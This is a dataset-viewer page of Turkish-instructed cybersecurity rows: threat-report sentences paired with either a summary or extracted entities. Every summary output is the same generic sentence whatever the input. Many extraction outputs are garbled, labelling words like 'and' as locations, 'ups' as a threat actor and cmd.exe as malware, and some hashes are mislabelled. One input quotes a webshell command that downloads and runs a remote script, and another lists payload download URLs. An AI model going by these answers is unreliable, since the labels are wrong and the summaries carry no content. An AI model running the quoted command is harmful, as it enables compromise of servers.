instruction stringclasses 2 values | input stringlengths 3 5.01k | output stringlengths 10 5.79k |
|---|---|---|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Figure 4. Code showing the seven defined messages. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | It possesses many features, such as the ability to use scheduled tasks as a method of maintaining persistence in the infected system. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Although we are not aware of any attacks using this technique, these signatures have proven effective in our testing against code publicly available on the Internet. When we take a closer look at the three exploits in our blog post last month, we see that various exploit techniques are based on a singular condition, which is arbitrary memory access. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | It allows an attacker to see all Windows sessions and can execute arbitrary commands on the session via session id. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Table 6 | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | The activity involved parameters issued to the webshell that would run a command to download and execute a script from a remote server as seen in the following: [redacted IPV4 address]:8080/tomcatwar.jsp?pwd=j&cmd=/bin/sh/-c${IFS}'cd${IFS}/tmp;wget${IFS}hxxp://107.174.133[.]167/t.sh${IFS}-O-%a6sh${IFS}SpringCore;' | URL: [redacted IPV4 address]:8080/tomcatwar.jsp?pwd=j&cmd=/bin/sh/-c${IFS}'cd${IFS}/tmp;wget${IFS}hxxp://107.174.133[.]167/t.sh${IFS}-O-%a6sh${IFS}SpringCore;' |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | It can also execute web shell commands via a specific HTTP request format. | location: can; attack-pattern: web shell |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | The Glupteba malware family is primarily distributed through pay per install (PPI) networks and via traffic purchased from traffic distribution systems (TDS). | malware: Glupteba; location: and |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Within these files is a link to an attacker controlled phishing domain. | attack-pattern: phishing |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Figure 28. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | A second HTTP server will also be created to listen on one of the aforementioned port numbers. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including “guest” posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers. | threat-actor: ups; location: and; location: security; location: likely; location: security |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | As previously mentioned, DarkSide avoids victimizing companies in CIS countries. | malware: DarkSide ; location: CIS countries |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | The “killswitch” is code which will attempt to connect to an extremely long domain that should not resolve. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Spear Phishing is a specific attack technique that has become widely used in the past few years. | attack-pattern: Spear Phishing |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | The Director of National Intelligence Avril Haines said “Nevertheless, our analysts assess that Putin is unlikely to be deterred by such setbacks and instead may escalate, essentially doubling down.” | identity: Director of National Intelligence Avril Haines; identity: Putin |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | In 2019, we confronted the risks posed by NSO Group again, relying upon NSO Groups’s marketing information suggesting that they had a 0-day exploit for Android. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Cortex Xpanse was able to identify ~800 instances of VMware Workspace ONE Access connected to the public internet, and can be leveraged to enumerate potentially vulnerable instances within customer networks. | SOFTWARE: Cortex Xpanse; SOFTWARE: VMware Workspace ONE Access |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Figure 2: Price of bitcoin in U.S. dollars from CoinMarketCap While botnets mining cryptocurrency is nothing new, the technique was much less profitable than using ransomware. | SOFTWARE: bitcoin; SOFTWARE: CoinMarketCa |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | In parallel, and to inform better hypothesis for the fingerprint generation, research is being done to determine how far single mutex analysis can take us. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | On May 30, Keven Beaumont wrote an article detailing the specifics of the initial incident. | identity: Keven Beaumont; TIME: May 30 |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | These approaches are not particularly clever or sophisticated, but often they are effective. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | FY 2022 Q2 is not included due to lack of sufficient information. | TIME: FY 2022 Q2 |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | We can see here that server hostnames were changed but they didn’t change the server IP address – see the attached file with results for files from last week’s campaign from VirusTotal. | SOFTWARE: VirusTotal |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | All SMS messages sent to the phone are uploaded, not just those that are relevant to Taomike’s platform. | identity: Taomike |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | There is some malware that exploits some vectors outlined in this article, but Palo Alto Networks Unit 42 is not aware of any active attacks against this particular vulnerability at this time. | identity: Palo Alto Networks Unit 42 |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | While many users breeze past the list of permissions required when installing new apps, readers of this blog should ask themselves, “Does my electronic bible need to read my SMS messages?” Sign up to receive the latest news, cyber threat intelligence and research from us | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | The message body and sender phone number are collected as shown in Figure 2. Figure 2. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | If we test it using a sample binary, the following is generated: Figure 5. Testing a sample binary using ConfuserEx There are two important aspects to this attribute: first, it is hardcoded as a string constant and second, its value is presented in clear text in the final binary as the following image shows. | tools: ConfuserEx |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | It can also take screenshots and record audio, including calls. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | That makes it difficult to match code similarities, and that is why many of the indicators of code sharing are sparse across different samples. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | In 2021, we reported nine 0-days affecting Chrome, Android, Apple and Microsoft, leading to patches to protect users from these attacks. | SOFTWARE: Chrome; identity: Microsoft; identity: Apple; TIME: 2021; SOFTWARE: Android |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | In such cases, an average user would not have the ability to fix a Cyclops Blink infection. | malware: Cyclops Blink |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Decrypted backdoor configuration | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Export name Year How C&C information is retreieved TStartUp 2005 – 2012 | TIME: 2005 – 2012 |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Our findings underscore the extent to which commercial surveillance vendors have proliferated capabilities historically only used by governments with the technical expertise to develop and operationalize exploits. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Increased Utilization | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | We’re not sure how love wound up in the chat room or how he met hayat22. | identity: love; identity: hayat22 |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Most either use ROS/ROS2 in their products, for example as robot manufacturers, or they want to help develop the software. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | In another routine, an Excel file attachment downloads the NSIS installer once the user enables the malicious macros from hxxp://109[.]234[.]37[.]15:80/j1 or hxxp://169[.]239[.]128[.]170/j1. | malware: NSIS |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Today’s Challenge | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | The network traffic generated by each Trojan uses the HTTP protocol, and despite its use of port 443, is not encrypted with SSL. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Based on our analysis, we believe that the StopWar app was developed by pro-Ukrainian developers and was the inspiration for what Turla actors based their fake CyberAzov DoS app off of. | SOFTWARE: StopWar app; malware: fake CyberAzov DoS app; threat-actor: Turla |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | The remote server can also send the following example response. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Figure 21. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Virlock uses, but isn’t limited to, PDF, DOC, PPT, JPG, BMP,GIF, RAR, 7Zip, Zip and EXE files. | malware: Virlock |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | While programmatic analysis would have a hard time associating the two, it's obvious to a human that the same face rolling technique was used to name this mutex. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Despite these measures, users still choose to open these files and enable their content, thus allowing macros to continue be a common attack vector – both in wide and simple attacks to deliver ransomware such as Emotet, as well as for sophisticated attacks like this Sofacy campaign. | malware: Emotet; campaign: Sofacy campaign; threat-actor: Sofacy |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Filename | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | It does this via cmd.exe with the following command: move /Y "{malware_location}" "C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gdrive.exe" Every time the malware runs a command using cmd.exe, the standard output (STDOUT) of the executed command is piped and written to a Google Drive account with the following filename format: {utcnow}_report_{victim’s id} Figure 6. | malware: cmd.exe; location: time; malware: cmd.exe; location: standard; location: and |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | After nearly as much debate as some of the real research, we’ve whittled the list down to our favorites (For the curious, these are all malware mutexes). | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | According to Microsoft, it affects versions of Internet Explorer from version 6 to 11, meaning that almost all IE users are vulnerable to this bug. | SOFTWARE: Internet Explorer; identity: Microsoft; SOFTWARE: IE |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | In terms of the severity of the vulnerabilities themselves: they are important, but not critical. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | After obtaining data from the modules, the core component starts the encryption routines that will cipher the data before sending it to the C&C server. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | IM Rules: 1010855 - Microsoft Exchange - HAFNIUM Targeted Vulnerabilities Trend Micro Vision One™ Correlation: Fig - Microsoft Exchange Server RCE Vulnerability (CVE-2021-26855 + CVE-2021-27065) Trend Micro Vision One™ is a purpose-built, threat defense platform with extended detection and response (XDR) capabilities that work to prevent majority of attacks with automated protection. | SOFTWARE: Trend Micro Vision One™; threat-actor: HAFNIUM; SOFTWARE: Trend Micro Vision One™; vulnerability: Microsoft Exchange Server RCE Vulnerability (CVE-2021-26855 + CVE-2021-27065); SOFTWARE: Microsoft Exchange |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Obviously, this is where our focus needs to be, hands down. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | We encourage anyone who discovers a Chrome vulnerability to report that activity via the Chrome VRP submission process. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Given all those points, this isn’t an attack that many of us need to worry about. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | We use our research to continuously improve the safety and security of our products and share this intelligence with the community to benefit the internet as a whole. | tools: safety; location: and; location: security; location: and; location: community |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | This allows attackers to hide their communications and avoid having their C2 servers shut down, but also makes it easy for organizations to block the threat. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | This blog was originally published on November 13, 2019. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | revealed some interesting things in that year: they used "com.example.appcode.appcode" as the APK package name and used a possible public certificate “74bd7b456d9e651fc84446f65041bef1207c408d,” which possibly meant the sample was used for testing, and they just started to use it for their campaigns during that year. | location: and; location: public; MD5: 74bd7b456d9e651fc84446f65041bef1207c408d; location: sample; location: and; identity: just |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | One notable campaign attempted to target personal accounts of U.S. government employees with phishing lures using American fast food franchises and COVID-19 messaging. | location: campaign; location: target; attack-pattern: phishing; location: and |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Hancitor isn’t particularly advanced in its tactics: it’s ideal target is an old or outdated version of Microsoft Windows like Windows 7 or even Windows XP. | malware: Hancitor; SOFTWARE: Microsoft Windows; SOFTWARE: Windows 7; SOFTWARE: Windows XP. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Latest Vacancy 8/28/18 careers@aramcojobs.ga Latest Vacancy 9/25/18 careers@aramcojobs.ga | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | In fact, the top three filenames – tomcarwar.jsp, checkexploit.jsp and javatestfila.jsp – account for over 84% of the activity with known webshell filenames. | FILEPATH: tomcarwar.jsp; FILEPATH: javatestfila.jsp; FILEPATH: checkexploit.jsp; attack-pattern: webshell |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Below are the details of eight SMS-based IAP SDKs discovered by Wildfire: | SOFTWARE: Wildfire |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | As demonstrated by the recent activities of DarkSide, modern ransomware has changed in many aspects: bigger targets, more advanced extortion techniques, and farther-reaching consequences beyond the victims themselves. | malware: DarkSide |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | All the request data are formatted to JSON, and they are encrypted by AES and encoded by base64. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | As of 13:00 UTC on June 28thth, approximately 4 Bitcoin have been transferred to the attacker's wallet. | TIME: 13:00 UTC on June 28th |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | When sending the information, ANEL encrypts the data using blowfish, XOR, and Base64-based encryption methods. | malware: ANEL |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | In collaboration with YouTube, Gmail, Trust & Safety, CyberCrime Investigation Group and Safe Browsing teams, our protections have decreased the volume of related phishing emails on Gmail by 99.6% since May 2021. | location: and; attack-pattern: phishing |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Please mark, I'm not a robot! | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Last week we released a series of IPS signatures to detect an advanced exploitation technique that takes advantage of ActiveX. In May, we linked a recent IE 0-day (CVE-2014-1776) to exploit code used against two other IE vulnerabilities exploited in the last 12 months. | vulnerability: CVE-2014-1776; SOFTWARE: IE; SOFTWARE: IE |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | We don't need to [00:07:00] drop the pamphlets out of the plane anymore. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | To add resilience to their infrastructure, the operators have also implemented a backup mechanism using the Bitcoin blockchain. | SOFTWARE: Bitcoin |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | We received leads from Graphika that supported us in this investigation. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Finally, we urge the United States to lead a diplomatic effort to work with the governments of the countries who harbor problematic vendors, as well as those who employ these tools, to build support for measures that limit harms caused by this industry. | identity: United States |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | This file is a legitimate Microsoft Windows binary. | identity: Microsoft |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Fake DUser.dll Trojan.MSIL.SIDEWINDER.A CBD5C68F5C4345B68F018D9E5810574E8036A2BC4D826BE5C8779E8019449957 Final payload Trojan.Win32.SIDEWINDER.B 34446F7F60F730FCCA145155D10D1AFF0A1153B085836DF38313772CD03C8D70 RTF file Trojan.W97M.CVE201711882.YQUOOWV 7238F4E5EDBE0E5A2242D8780FB58C47E7D32BF2C4F860C88C511C30675D0857 RTF file | SHA2: CBD5C68F5C4345B68F018D9E5810574E8036A2BC4D826BE5C8779E8019449957; SHA2: 34446F7F60F730FCCA145155D10D1AFF0A1153B085836DF38313772CD03C8D70; SHA2: 7238F4E5EDBE0E5A2242D8780FB58C47E7D32BF2C4F860C88C511C30675D0857 |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | This Unit 42 blog post provides an update on the threat situation surrounding the Bad Rabbit ransomware attacks. | identity: Unit 42; malware: Bad Rabbit |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | When they would do this, the Hancitor attachment would download and install the final malware from a malicious or compromised site. | malware: Hancitor |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Already the Conti and Lockbit ransomware collectives have stated their support. | threat-actor: Conti ; threat-actor: Lockbit |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | The patch provided by Microsoft included the typical release of operating system patches, but this time a new Application Programming Interface (API) function was added. | SOFTWARE: Microsoft |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Maze was one of the first documented cases of this. | malware: Maze |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | While document-based attacks have been a common attack vector for over a decade, we’re seeing a recent rise in their popularity and complexity. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | The exploit worked and ran our bash script as root. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | We manually analyzed a sample set of these cybersquatting domains. | attack-pattern: cybersquatting |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | In these posts here and here we talk about what XDR is and how it brings in more sources, such as network data. | SOFTWARE: XDR |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | C&C Server PLEAD Shrouded Crossbow Waterbear itaiwans[.]com Yes No Yes microsoftmse[.]com Yes Yes No 211[.]72[.]242[.]120 Yes Yes No | malware: PLEAD; threat-actor: Shrouded Crossbow; malware: Waterbear; IPV4: 211[.]72[.]242[.]120 |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Figure 14. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Tracking Water Nue’s activities | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Highlights from the 2021 Unit 42 Ransomware Threat Report Ransomware Threat Assessments: A Companion to the 2021 Unit 42 Ransomware Threat Report Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! | identity: Unit 42; identity: Unit 42 |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Palo Alto Networks Wildfire, through custom SMS blocking policies, recently discovered eight different SMS-based IAP SDKs with this abusive functionality. | SOFTWARE: Palo Alto Networks Wildfire |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | The Filmkan dropper has a Flash icon to help make it appear as a legitimate update. The author of Filmkan created the dropper using AutoHotkey (AHK), a legitimate tool for creating Windows applications using a custom scripting language. | location: tool; attack-pattern: scripting |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Join us Wednesday, April 30 at 3 p.m. EDT, for a new webinar, “Need to Defeat APTs? | TIME: 3 p.m. EDT |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | For users, Android provides safety and control over how apps and third parties can access the data from their devices. | SOFTWARE: Android |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | The list of target websites for the app can be seen in the CyberChef recipe here. | SOFTWARE: CyberChef |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | And we don’t just plug security holes – we work to eliminate entire classes of threats for consumers and businesses whose work depends on the Internet. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.